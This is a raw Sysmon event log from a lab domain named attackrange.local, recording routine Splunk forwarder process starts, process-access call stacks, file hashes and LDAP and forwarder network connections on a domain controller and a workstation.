10341000x8000000000000000103776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B2A2-615A-D701-00000000FC01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2A2-615A-D701-00000000FC01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.261{58E9C193-B2A2-615A-D701-00000000FC01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.182{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32BE37F37983830B9A57F33A8E364E3F,SHA256=10A1C46BB465B931B4DDC900A3D1921133C7C758151EFBCD79ABB85D823BF85D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.917{58E9C193-B2A3-615A-D901-00000000FC01}52241028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2A3-615A-D901-00000000FC01}5224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B2A3-615A-D901-00000000FC01}5224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.667{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2A3-615A-D901-00000000FC01}5224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.668{58E9C193-B2A3-615A-D901-00000000FC01}5224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.651{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=443D669CC120180CF10B125DFCE276D7,SHA256=2109A0303B980B1CD5B1834055F37212F185315017F2540D69F6F83AF99717F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081651Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:03.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E38DA974966707DBA33B10F18131B38,SHA256=675BC903A96EC34937AB4B4FC3C69587369F6DB46881F7B2E9DE90E3E6D31E06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.418{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49549-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000103798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.418{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49549-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 10341000x8000000000000000103797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.370{58E9C193-B2A3-615A-D801-00000000FC01}66366528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.276{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6B1EAF9A7CF1C303E2C03FB409CDD60,SHA256=0C5843BA872F5F1218435DD7871FE1C476BD54A20D694DF49B2290A20FD8822B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2A3-615A-D801-00000000FC01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B2A3-615A-D801-00000000FC01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.167{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2A3-615A-D801-00000000FC01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.168{58E9C193-B2A3-615A-D801-00000000FC01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:04.745{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25B04A97F2151DAFB178B906F0EFAAE3,SHA256=D4702F8C22FFC2625B0857FC6386550088E8699BEFF5FAB43725BED65CB7A0C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:04.667{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82012A8DF1A9D29E2D216A710AE8D34F,SHA256=697F1B611EB955D48B6E1775DC5C3186D764B33894CC9E929AE6BC36DEE71BEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081652Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:04.359{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB80AADE10A81F00CCE1FA76F2E848B,SHA256=FBF906F6626D4606389899CDE299FD750A75E0F296492179115F042369A919CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:03.246{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49550-false10.0.1.12-8000- 23542300x8000000000000000103821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616A67D68FC80D0285BFA2F87031A4E3,SHA256=5D9F54B632755260C4D818A4692173218DF6516479A9AA0E92F6983C72AC2940,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081654Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:02.771{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50044-false10.0.1.12-8000- 23542300x800000000000000081653Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:05.359{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9310CB37BFF2B1789A29430ABAD761,SHA256=F2BD1F44E71306A5DC8BB6DC5003BFF9C69A59A726A3DDDE5CF6D3755C19326D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2A5-615A-DA01-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 